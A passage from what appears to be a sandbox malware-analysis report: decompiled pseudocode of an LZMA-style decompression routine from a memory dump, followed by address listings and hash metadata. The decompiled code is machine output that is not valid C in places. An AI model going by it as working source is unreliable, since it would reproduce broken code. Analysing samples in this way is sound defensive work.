                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  															 *__esi = __dx;
                  														}
                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                  														if( *(__ebp - 0x10) >= 0x1000000) {
                  															L111:
                  															_t368 = __ebp - 0x48;
                  															 *_t368 =  *(__ebp - 0x48) + 1;
                  															__eflags =  *_t368;
                  															goto L112;
                  														} else {
                  															goto L109;
                  														}
                  													}
                  													__ecx =  *(__ebp - 0xc);
                  													__ebx = __ebx + __ebx;
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  													 *(__ebp - 0x44) = __ebx;
                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  														__ecx =  *(__ebp - 0x10);
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  														__ebx = __ebx | 0x00000001;
                  														__eflags = __ebx;
                  														 *(__ebp - 0x44) = __ebx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														L101:
                  														_t338 = __ebp - 0x48;
                  														 *_t338 =  *(__ebp - 0x48) - 1;
                  														__eflags =  *_t338;
                  														goto L102;
                  													} else {
                  														goto L99;
                  													}
                  												}
                  												__edx =  *(__ebp - 4);
                  												__eax = __eax - __ebx;
                  												 *(__ebp - 0x40) = __ecx;
                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  												goto L108;
                  											case 0x1a:
                  												L56:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													 *(__ebp - 0x88) = 0x1a;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x68);
                  												__al =  *(__ebp - 0x5c);
                  												__edx =  *(__ebp - 8);
                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  												 *( *(__ebp - 0x68)) = __al;
                  												__ecx =  *(__ebp - 0x14);
                  												 *(__ecx +  *(__ebp - 8)) = __al;
                  												__eax = __ecx + 1;
                  												__edx = 0;
                  												_t192 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t192;
                  												goto L80;
                  											case 0x1b:
                  												L76:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													 *(__ebp - 0x88) = 0x1b;
                  													goto L170;
                  												}
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__edx =  *(__ebp - 8);
                  												__cl =  *(__eax + __edx);
                  												__eax =  *(__ebp - 0x14);
                  												 *(__ebp - 0x5c) = __cl;
                  												 *(__eax + __edx) = __cl;
                  												__eax = __eax + 1;
                  												__edx = 0;
                  												_t275 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t275;
                  												__eax =  *(__ebp - 0x68);
                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												_t284 = __ebp - 0x64;
                  												 *_t284 =  *(__ebp - 0x64) - 1;
                  												__eflags =  *_t284;
                  												 *( *(__ebp - 0x68)) = __cl;
                  												L80:
                  												 *(__ebp - 0x14) = __edx;
                  												goto L81;
                  											case 0x1c:
                  												while(1) {
                  													L123:
                  													__eflags =  *(__ebp - 0x64);
                  													if( *(__ebp - 0x64) == 0) {
                  														break;
                  													}
                  													__eax =  *(__ebp - 0x14);
                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  													__eflags = __eax -  *(__ebp - 0x74);
                  													if(__eax >=  *(__ebp - 0x74)) {
                  														__eax = __eax +  *(__ebp - 0x74);
                  														__eflags = __eax;
                  													}
                  													__edx =  *(__ebp - 8);
                  													__cl =  *(__eax + __edx);
                  													__eax =  *(__ebp - 0x14);
                  													 *(__ebp - 0x5c) = __cl;
                  													 *(__eax + __edx) = __cl;
                  													__eax = __eax + 1;
                  													__edx = 0;
                  													_t414 = __eax %  *(__ebp - 0x74);
                  													__eax = __eax /  *(__ebp - 0x74);
                  													__edx = _t414;
                  													__eax =  *(__ebp - 0x68);
                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  													__eflags =  *(__ebp - 0x30);
                  													 *( *(__ebp - 0x68)) = __cl;
                  													 *(__ebp - 0x14) = _t414;
                  													if( *(__ebp - 0x30) > 0) {
                  														continue;
                  													} else {
                  														L81:
                  														 *(__ebp - 0x88) = 2;
                  														goto L1;
                  													}
                  												}
                  												 *(__ebp - 0x88) = 0x1c;
                  												goto L170;
                  										}
                  									}
                  									L171:
                  									_t535 = _t534 | 0xffffffff;
                  									goto L172;
                  								}
                  							}
                  						}
                  					}
                  					goto L1;
                  				}
                  			}













                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8
                  0x00000000
                  0x0040640d

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                  • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                  • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                  • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00406355() {
                  				unsigned short _t531;
                  				signed int _t532;
                  				void _t533;
                  				signed int _t534;
                  				signed int _t535;
                  				signed int _t565;
                  				signed int _t568;
                  				signed int _t589;
                  				signed int* _t606;
                  				void* _t613;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					if( *(_t613 - 0x40) != 0) {
                  						 *(_t613 - 0x84) = 0xa;
                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                  					} else {
                  						 *(__ebp - 0x84) = 9;
                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  					}
                  					while(1) {
                  						 *(_t613 - 0x54) = _t606;
                  						while(1) {
                  							L133:
                  							_t531 =  *_t606;
                  							_t589 = _t531 & 0x0000ffff;
                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                  							if( *(_t613 - 0xc) >= _t565) {
                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                  								 *(_t613 - 0x40) = 1;
                  								_t532 = _t531 - (_t531 >> 5);
                  								 *_t606 = _t532;
                  							} else {
                  								 *(_t613 - 0x10) = _t565;
                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                  							}
                  							if( *(_t613 - 0x10) >= 0x1000000) {
                  								goto L139;
                  							}
                  							L137:
                  							if( *(_t613 - 0x6c) == 0) {
                  								 *(_t613 - 0x88) = 5;
                  								L170:
                  								_t568 = 0x22;
                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                  								_t535 = 0;
                  								L172:
                  								return _t535;
                  							}
                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                  							L139:
                  							_t533 =  *(_t613 - 0x84);
                  							while(1) {
                  								 *(_t613 - 0x88) = _t533;
                  								while(1) {
                  									L1:
                  									_t534 =  *(_t613 - 0x88);
                  									if(_t534 > 0x1c) {
                  										break;
                  									}
                  									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                  										case 0:
                  											if( *(_t613 - 0x6c) == 0) {
                  												goto L170;
                  											}
                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  											_t534 =  *( *(_t613 - 0x70));
                  											if(_t534 > 0xe1) {
                  												goto L171;
                  											}
                  											_t538 = _t534 & 0x000000ff;
                  											_push(0x2d);
                  											asm("cdq");
                  											_pop(_t570);
                  											_push(9);
                  											_pop(_t571);
                  											_t609 = _t538 / _t570;
                  											_t540 = _t538 % _t570 & 0x000000ff;
                  											asm("cdq");
                  											_t604 = _t540 % _t571 & 0x000000ff;
                  											 *(_t613 - 0x3c) = _t604;
                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                  												L10:
                  												if(_t612 == 0) {
                  													L12:
                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  													goto L15;
                  												} else {
                  													goto L11;
                  												}
                  												do {
                  													L11:
                  													_t612 = _t612 - 1;
                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                  												} while (_t612 != 0);
                  												goto L12;
                  											}
                  											if( *(_t613 - 4) != 0) {
                  												GlobalFree( *(_t613 - 4));
                  											}
                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                  											 *(_t613 - 4) = _t534;
                  											if(_t534 == 0) {
                  												goto L171;
                  											} else {
                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                  												goto L10;
                  											}
                  										case 1:
                  											L13:
                  											__eflags =  *(_t613 - 0x6c);
                  											if( *(_t613 - 0x6c) == 0) {
                  												 *(_t613 - 0x88) = 1;
                  												goto L170;
                  											}
                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  											_t45 = _t613 - 0x48;
                  											 *_t45 =  *(_t613 - 0x48) + 1;
                  											__eflags =  *_t45;
                  											L15:
                  											if( *(_t613 - 0x48) < 4) {
                  												goto L13;
                  											}
                  											_t546 =  *(_t613 - 0x40);
                  											if(_t546 ==  *(_t613 - 0x74)) {
                  												L20:
                  												 *(_t613 - 0x48) = 5;
                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                  												goto L23;
                  											}
                  											 *(_t613 - 0x74) = _t546;
                  											if( *(_t613 - 8) != 0) {
                  												GlobalFree( *(_t613 - 8));
                  											}
                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                  											 *(_t613 - 8) = _t534;
                  											if(_t534 == 0) {
                  												goto L171;
                  											} else {
                  												goto L20;
                  											}
                  										case 2:
                  											L24:
                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                  											 *(_t613 - 0x84) = 6;
                  											 *(_t613 - 0x4c) = _t553;
                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                  											 *(_t613 - 0x54) = _t606;
                  											goto L133;
                  										case 3:
                  											L21:
                  											__eflags =  *(_t613 - 0x6c);
                  											if( *(_t613 - 0x6c) == 0) {
                  												 *(_t613 - 0x88) = 3;
                  												goto L170;
                  											}
                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  											_t67 = _t613 - 0x70;
                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                  											__eflags =  *_t67;
                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                  											L23:
                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                  											if( *(_t613 - 0x48) != 0) {
                  												goto L21;
                  											}
                  											goto L24;
                  										case 4:
                  											L133:
                  											_t531 =  *_t606;
                  											_t589 = _t531 & 0x0000ffff;
                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                  											if( *(_t613 - 0xc) >= _t565) {
                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                  												 *(_t613 - 0x40) = 1;
                  												_t532 = _t531 - (_t531 >> 5);
                  												 *_t606 = _t532;
                  											} else {
                  												 *(_t613 - 0x10) = _t565;
                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                  											}
                  											if( *(_t613 - 0x10) >= 0x1000000) {
                  												goto L139;
                  											}
                  										case 5:
                  											goto L137;
                  										case 6:
                  											__edx = 0;
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x34) = 1;
                  												 *(__ebp - 0x84) = 7;
                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                  												while(1) {
                  													 *(_t613 - 0x54) = _t606;
                  													goto L133;
                  												}
                  											}
                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  											__esi =  *(__ebp - 0x60);
                  											__cl = 8;
                  											__cl = 8 -  *(__ebp - 0x3c);
                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  											__ecx =  *(__ebp - 0x3c);
                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  											__ecx =  *(__ebp - 4);
                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  											__eflags =  *(__ebp - 0x38) - 4;
                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  											if( *(__ebp - 0x38) >= 4) {
                  												__eflags =  *(__ebp - 0x38) - 0xa;
                  												if( *(__ebp - 0x38) >= 0xa) {
                  													_t98 = __ebp - 0x38;
                  													 *_t98 =  *(__ebp - 0x38) - 6;
                  													__eflags =  *_t98;
                  												} else {
                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  												}
                  											} else {
                  												 *(__ebp - 0x38) = 0;
                  											}
                  											__eflags =  *(__ebp - 0x34) - __edx;
                  											if( *(__ebp - 0x34) == __edx) {
                  												__ebx = 0;
                  												__ebx = 1;
                  												goto L61;
                  											} else {
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__ecx =  *(__ebp - 8);
                  												__ebx = 0;
                  												__ebx = 1;
                  												__al =  *((intOrPtr*)(__eax + __ecx));
                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  												goto L41;
                  											}
                  										case 7:
                  											__eflags =  *(__ebp - 0x40) - 1;
                  											if( *(__ebp - 0x40) != 1) {
                  												__eax =  *(__ebp - 0x24);
                  												 *(__ebp - 0x80) = 0x16;
                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  												__eax =  *(__ebp - 0x28);
                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  												__eax =  *(__ebp - 0x2c);
                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  												__al = __al & 0x000000fd;
                  												__eax = (__eflags >= 0) - 1 + 0xa;
                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                  												__eax =  *(__ebp - 4);
                  												__eax =  *(__ebp - 4) + 0x664;
                  												__eflags = __eax;
                  												 *(__ebp - 0x58) = __eax;
                  												goto L69;
                  											}
                  											__eax =  *(__ebp - 4);
                  											__ecx =  *(__ebp - 0x38);
                  											 *(__ebp - 0x84) = 8;
                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                  											while(1) {
                  												 *(_t613 - 0x54) = _t606;
                  												goto L133;
                  											}
                  										case 8:
                  											goto L0;
                  										case 9:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												goto L89;
                  											}
                  											__eflags =  *(__ebp - 0x60);
                  											if( *(__ebp - 0x60) == 0) {
                  												goto L171;
                  											}
                  											__eax = 0;
                  											__eflags =  *(__ebp - 0x38) - 7;
                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                  											__eflags = _t258;
                  											0 | _t258 = _t258 + _t258 + 9;
                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                  											goto L75;
                  										case 0xa:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x84) = 0xb;
                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                  												while(1) {
                  													 *(_t613 - 0x54) = _t606;
                  													goto L133;
                  												}
                  											}
                  											__eax =  *(__ebp - 0x28);
                  											goto L88;
                  										case 0xb:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__ecx =  *(__ebp - 0x24);
                  												__eax =  *(__ebp - 0x20);
                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  											} else {
                  												__eax =  *(__ebp - 0x24);
                  											}
                  											__ecx =  *(__ebp - 0x28);
                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  											L88:
                  											__ecx =  *(__ebp - 0x2c);
                  											 *(__ebp - 0x2c) = __eax;
                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  											L89:
                  											__eax =  *(__ebp - 4);
                  											 *(__ebp - 0x80) = 0x15;
                  											__eax =  *(__ebp - 4) + 0xa68;
                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                  											goto L69;
                  										case 0xc:
                  											L99:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xc;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t334 = __ebp - 0x70;
                  											 *_t334 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t334;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											__eax =  *(__ebp - 0x2c);
                  											goto L101;
                  										case 0xd:
                  											L37:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xd;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t122 = __ebp - 0x70;
                  											 *_t122 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t122;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L39:
                  											__eax =  *(__ebp - 0x40);
                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  												goto L48;
                  											}
                  											__eflags = __ebx - 0x100;
                  											if(__ebx >= 0x100) {
                  												goto L54;
                  											}
                  											L41:
                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  											__ecx =  *(__ebp - 0x58);
                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  											 *(__ebp - 0x48) = __eax;
                  											__eax = __eax + 1;
                  											__eax = __eax << 8;
                  											__eax = __eax + __ebx;
                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  											__ax =  *__esi;
                  											 *(__ebp - 0x54) = __esi;
                  											__edx = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												 *(__ebp - 0x40) = 1;
                  												__cx = __ax >> 5;
                  												__eflags = __eax;
                  												__ebx = __ebx + __ebx + 1;
                  												 *__esi = __ax;
                  											} else {
                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edx;
                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  												__ebx = __ebx + __ebx;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											 *(__ebp - 0x44) = __ebx;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L39;
                  											} else {
                  												goto L37;
                  											}
                  										case 0xe:
                  											L46:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xe;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t156 = __ebp - 0x70;
                  											 *_t156 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t156;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											while(1) {
                  												L48:
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													break;
                  												}
                  												__eax =  *(__ebp - 0x58);
                  												__edx = __ebx + __ebx;
                  												__ecx =  *(__ebp - 0x10);
                  												__esi = __edx + __eax;
                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
